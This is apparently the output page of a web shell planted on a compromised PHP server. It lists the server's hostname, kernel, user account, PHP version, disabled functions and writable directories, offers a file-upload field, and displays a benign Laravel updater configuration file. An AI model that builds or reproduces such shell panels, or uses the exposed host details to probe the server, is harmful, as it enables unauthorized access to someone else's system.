%PDF- %GIF98; %PNG; .
Cyber Programmer
Logo of a company Server : Apache
System : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : addictionfreeind ( 1003)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/addictionfreeind/www/admin1/vendor/pcinaglia/laraupdater/config/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/addictionfreeind/www/admin1/vendor/pcinaglia/laraupdater/config/laraupdater.php
<?php
/*
* @author: Pietro Cinaglia
* https://github.com/pietrocinaglia
*/
	 
	return [

		/*
		* Temporary folder to store update before to install it.
		*/
		'tmp_folder_name' => 'tmp',

		/*
		* Script's filename called during the update.
		*/
		'script_filename' => 'upgrade.php',

		/*
		* URL where your updates are stored ( e.g. for a folder named 'updates', under http://site.com/yourapp ).
		*/
		'update_baseurl' => 'http://localhost:8888/update',

		/*
		* Set a middleware for the route: updater.update
		* Only 'auth' NOT works (manage security using 'allow_users_id' configuration)
		*/
		'middleware' => ['web', 'auth'],

		/*
		* Set which users can perform an update; 
		* This parameter accepts: ARRAY(user_id) ,or FALSE => for example: [1]  OR  [1,3,0]  OR  false
		* Generally, ADMIN have user_id=1; set FALSE to disable this check (not recommended)
		*/
		'allow_users_id' => [1] 
	];

VaKeR 2022